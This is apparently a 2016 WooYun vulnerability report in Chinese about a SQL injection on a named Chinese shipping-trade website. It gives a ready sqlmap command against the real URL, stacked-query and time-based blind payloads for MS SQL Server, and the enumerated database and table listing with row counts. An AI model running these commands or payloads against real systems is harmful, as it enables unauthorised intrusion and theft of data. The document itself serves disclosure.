漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0167548
漏洞标题:中国航贸网某漏洞影响全网数据安全
相关厂商:北京中航贸网络科技有限公司
漏洞作者: 路人甲
提交时间:2016-01-06 10:18
修复时间:2016-02-12 18:49
公开时间:2016-02-12 18:49
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-12: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中国航贸网某漏洞导致全网数据沦陷#百万记录+大量数据测漏
详细说明:
sqlmap.py -u "http://www.snet.com.cn/cms/turnpage/turnpagesearch_en.jsp" --data "column_id=86%2C87%2C88&wherestr=88952634" --dbs
漏洞证明:
Place: POST
Parameter: wherestr
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: column_id=86,87,88&wherestr=88952634'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: column_id=86,87,88&wherestr=88952634' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] adv
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] snet-1
[*] tempdb
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
Database: snet-1
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| dbo.cms_comment | 1328413 |
| dbo.cms_item_links | 709804 |
| dbo.cms_log | 656409 |
| dbo.A10 | 387862 |
| dbo.cms_item | 289189 |
| dbo.cms_page | 260469 |
| dbo.item_turnpage | 247987 |
| dbo.item_turnpageb | 247987 |
| dbo.tblIP | 165501 |
| dbo.St02 | 153833 |
| dbo.SNet_UserColumn | 139073 |
| dbo.s0102 | 109092 |
| dbo.S01 | 109022 |
| dbo.S02 | 108016 |
| dbo.SNET_USER_POWER | 101171 |
| dbo.ship_hire | 73135 |
| dbo.cms_feedback | 59968 |
| dbo.S12 | 58938 |
| dbo.cms_item_zhuBI2 | 57359 |
| dbo.preferential_price | 48425 |
| dbo.VesselCertificateInfo | 41350 |
| dbo.CompanyInfor | 37526 |
| dbo.ColumnAccessCount | 37127 |
| dbo.hangwuzk | 30322 |
| dbo.S01LoginLog | 30263 |
| dbo.VesselTrade | 24374 |
| dbo.cms_right | 22493 |
| dbo.VesselInfo | 18042 |
| dbo.A07 | 17108 |
| dbo.cms_files | 15613 |
| dbo.cm2 | 15549 |
| dbo.ccd | 15461 |
| dbo.A06 | 13310 |
| dbo.cms_item_zhuBI | 12830 |
| dbo.cms_files0604 | 11030 |
| dbo.ryprize | 10524 |
| dbo.A08 | 9711 |
| dbo.cfia_a03 | 9378 |
| dbo.admi | 8312 |
| dbo.A01 | 7977 |
| dbo.Exponent | 4467 |
| dbo.CargoInfo | 4370 |
| dbo.article | 4064 |
| dbo.gpxx | 3948 |
| dbo.SNet_User | 3539 |
| dbo.zscontent | 3100 |
| dbo.page_element_relation | 3073 |
| dbo.cms_item_view | 3000 |
| dbo.tblUserLogon | 2440 |
| dbo.A05 | 2384 |
| dbo.St01 | 2200 |
| dbo.TCFReport | 2186 |
| dbo.sort | 2140 |
| dbo.VIEW_SORT | 2140 |
| dbo.BBS_User | 1818 |
| dbo.bbs | 1791 |
| dbo.Forum_content | 1791 |
| dbo.templates_element_relation | 1753 |
| dbo.VCFReport | 1365 |
| dbo.ProfessionInfor | 1347 |
| dbo.spcontent | 1148 |
| dbo.cms_elements | 1102 |
| dbo.PolicyLawInfor | 1045 |
| dbo._Sort_Count | 1033 |
| dbo.yoil | 1015 |
| dbo.qizubiao | 929 |
| dbo.cms_right_role_relationship | 920 |
| dbo.e_news | 919 |
| dbo.hczcb | 825 |
| dbo.VesselTenancy | 815 |
| dbo.cpoil | 806 |
| dbo.spe_vote_result | 732 |
| dbo.wljzb | 715 |
| dbo.A03 | 660 |
| dbo.SeaCase | 593 |
| dbo.chat | 587 |
| dbo.regist | 547 |
| dbo.L01 | 504 |
| dbo.PortCompany | 504 |
| dbo.wlj | 444 |
| dbo.goods | 372 |
| dbo.cms_templates | 359 |
| dbo.registbf | 353 |
| dbo.ProfessionCritique | 334 |
| dbo.articlecontent | 316 |
| dbo.PollResult | 298 |
| dbo._sysDBTableItemCount | 297 |
| dbo.PortInfor | 295 |
| dbo.tjsjtype3 | 261 |
| dbo.A11 | 252 |
| dbo.Results | 230 |
| dbo.Nation | 213 |
| dbo.Code07 | 208 |
| dbo.columncount | 193 |
| dbo.A12 | 182 |
| dbo.cms_column | 180 |
| dbo.MemberMailList | 172 |
| dbo.A02 | 160 |
| dbo.QueryTable | 160 |
| dbo.wytj | 159 |
| dbo.huiyigg | 147 |
| dbo.spe_vote_answer | 144 |
| dbo.SeaLaw | 143 |
| dbo.UserID | 138 |
| dbo.DataInput_yinxiangchuban | 137 |
| dbo.DataInput_dizichuban | 132 |
| dbo.cms_group_user_relationship | 126 |
| dbo.hmwj | 122 |
| dbo.Code12 | 110 |
| dbo.A_ENewsPaper | 104 |
| dbo._cms_Item_count | 100 |
| dbo.DataInput_baokan | 100 |
| dbo.pay | 97 |
| dbo.forum | 94 |
| dbo.ztarticle | 93 |
| dbo.Investigation2 | 91 |
| dbo.Code06 | 80 |
| dbo.cfia_c03 | 73 |
| dbo.Related_Reports | 73 |
| dbo.Code08 | 70 |
| dbo.SNet_Column | 69 |
| dbo.C04 | 67 |
| dbo.Country | 67 |
| dbo.ship_type | 67 |
| dbo.cfia_a01 | 65 |
| dbo.S11 | 63 |
| dbo.xinxics | 62 |
| dbo.PactRoot | 61 |
| dbo.cms_elements_group | 54 |
| dbo.list | 53 |
| dbo.Snet_Item | 52 |
| dbo.shop_cs | 51 |
| dbo.InforResearch | 46 |
| dbo.user_shop | 46 |
| dbo.Investigation | 41 |
| dbo.cms_role_group_relationship | 38 |
| dbo.YONGHUBIAO | 38 |
| dbo.hmwj2 | 37 |
| dbo.anclass | 36 |
| dbo.articletype | 34 |
| dbo.User_Column_date | 34 |
| dbo.C21 | 33 |
| dbo.gpmc | 33 |
| dbo.u01 | 33 |
| dbo.author | 31 |
| dbo.Province | 31 |
| dbo.wlyq | 29 |
| dbo.cms_elements_groupbak | 28 |
| dbo.Code02 | 28 |
| dbo.code03 | 28 |
| dbo.C01 | 27 |
| dbo.cms_element_assign | 27 |
| dbo.category | 26 |
| dbo.prizetype2 | 26 |
| dbo.tjsjtype2 | 26 |
| dbo.SeaArbitrate | 25 |
| dbo.aclass | 22 |
| dbo.ccdUser | 22 |
| dbo.DataInput_yinshuaqiye | 22 |
| dbo.hmwjtj | 22 |
| dbo.ProfessionInforType | 22 |
| dbo.DataInput_yinxiangzhizuo | 20 |
| dbo.userarea | 20 |
| dbo.ExponentType | 19 |
| dbo.MySearch | 19 |
| dbo.PortOil | 19 |
| dbo.cfia_a02 | 18 |
| dbo.cms_user | 18 |
| dbo.hmwjtj2 | 18 |
| dbo.PolicyLawInforType | 18 |
| dbo.s010604 | 18 |
| dbo.tbtj | 18 |
| dbo.publiccode | 17 |
| dbo.cms_group | 16 |
| dbo.hdtype | 15 |
| dbo.spe_vote_main | 15 |
| dbo.skyway | 14 |
| dbo.DataInput_internetchuban | 13 |
| snetadmin.D99_Tmp | 13 |
| dbo.Code05 | 12 |
| dbo.Code14 | 12 |
| dbo.linecompany | 12 |
| dbo.C02 | 11 |
| dbo.CompanyInforType | 11 |
| dbo.dyhz | 11 |
| dbo.prizetype1 | 11 |
| dbo.zstype2 | 11 |
| dbo.back_UserItem | 10 |
| dbo.Code04 | 10 |
| dbo.Code11 | 10 |
| dbo.Code13 | 10 |
| dbo.Poll | 10 |
| dbo.zstype1 | 10 |
| dbo.cms_role | 9 |
| dbo.Continent | 9 |
| dbo.PortPicture | 9 |
| dbo.test | 9 |
| dbo.type1 | 9 |
| dbo.Code09 | 8 |
| dbo.CompanyType | 8 |
| dbo.spe_vote_question | 8 |
| dbo.StatInforType | 8 |
| dbo.C03 | 7 |
| dbo.C10 | 7 |
| dbo.cfia_c01 | 7 |
| dbo.CompanyProperty | 7 |
| dbo.linename | 7 |
| dbo.ProfessionCritiqueType | 7 |
| dbo.sptype1 | 7 |
| dbo.ztflth | 7 |
| dbo.admiraltytype | 6 |
| dbo.back_User | 6 |
| dbo.Code01 | 6 |
| dbo.Code10 | 6 |
| dbo.fl | 6 |
| dbo.Stock | 6 |
| dbo.tjsjtype1 | 6 |
| dbo.C20 | 5 |
| dbo.gpfl | 5 |
| dbo.C05 | 4 |
| dbo.engdk | 4 |
| dbo.FaxUserInfo | 4 |
| dbo.sort0604 | 4 |
| dbo.xwrwtj | 4 |
| dbo.zaixiandy | 4 |
| dbo.cfia_c02 | 3 |
| dbo.cfia_c04 | 3 |
| dbo.code20 | 3 |
| dbo.e_order | 3 |
| dbo.ztfl | 3 |
| dbo.aa | 2 |
| dbo.hmzt | 2 |
| dbo.Lweek01 | 2 |
| dbo.oil_type | 2 |
| dbo.admiralty | 1 |
| dbo.bmlc_count | 1 |
| dbo.D99_REG | 1 |
| dbo.esa | 1 |
| dbo.hczc | 1 |
| dbo.newstype | 1 |
| dbo.oil_price | 1 |
| dbo.qz | 1 |
| dbo.s09 | 1 |
| dbo.self_help_config | 1 |
| dbo.tblAdmin | 1 |
| dbo.test_user | 1 |
| dbo.zaixian | 1 |
| dbo.zjzx | 1 |
+---------------------------------+---------+
修复方案:
参数过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝